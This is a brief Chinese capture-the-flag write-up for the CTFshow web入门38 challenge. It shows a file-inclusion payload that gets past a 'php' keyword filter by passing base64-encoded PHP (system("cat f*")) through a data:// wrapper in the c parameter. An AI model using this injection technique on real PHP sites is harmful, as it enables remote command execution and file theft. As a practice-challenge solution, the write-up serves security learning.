在web37的基础上过滤了php 使用data://text/plain;base64绕过 payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs= PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<?php system("cat f*");
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
CTFshow WEB入门38
原文:https://www.cnblogs.com/z1ten9/p/14360509.html